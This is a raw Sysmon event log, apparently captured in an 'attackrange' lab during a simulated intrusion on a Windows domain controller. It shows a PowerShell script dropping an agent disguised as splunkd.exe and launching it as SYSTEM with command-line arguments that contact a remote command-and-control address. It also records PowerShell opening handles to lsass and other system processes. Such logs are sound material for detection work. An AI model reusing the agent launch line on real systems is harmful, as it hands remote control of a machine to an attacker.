10341000x80000000000000001268Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:12.243{10ACEC4A-8541-5FCF-1900-000000009101}21842852數䠀ऀЀ袾蕑衮ꙑ⹮{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\shell32.dll+74f4f|C:\Windows\System32\shell32.dll+74ddc|C:\Windows\System32\shell32.dll+74b2c|C:\Windows\System32\shell32.dll+c76a7|C:\Windows\System32\shell32.dll+c7605|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+33903a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+276811|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+acd828|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+271e5f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b56bc|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+3c750a70(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\221211b0f1173771b1b65a7943b57a5c\Microsoft.PowerShell.Commands.Management.ni.dll+3c750a70(wow64) 154100x80000000000000001267Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:12.186{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{10ACEC4A-8541-5FCF-1900-000000009101}2184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 13241300x80000000000000001266Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001265Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001264Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001263Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000000) 13241300x80000000000000001262Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000001261Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000001260Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000001259Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000001258Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000001257Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000001256Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000001255Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:12.196{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-935 11241100x80000000000000001254Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localEXE2020-12-08 13:53:11.774{10ACEC4A-8541-5FCF-1900-000000009101}2184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2020-12-08 13:52:09.978 10341000x80000000000000001253Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001252Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001251Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001250Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001248Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001247Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001246Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001245Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001244Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001243Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001242Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001241Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001240Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001239Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001238Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1C00-000000009101}2208C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001237Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-1800-000000009101}2124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001236Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001235Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:11.633{10ACEC4A-8541-5FCF-1900-000000009101}21842852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8190E3F41) 10341000x80000000000000001234Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 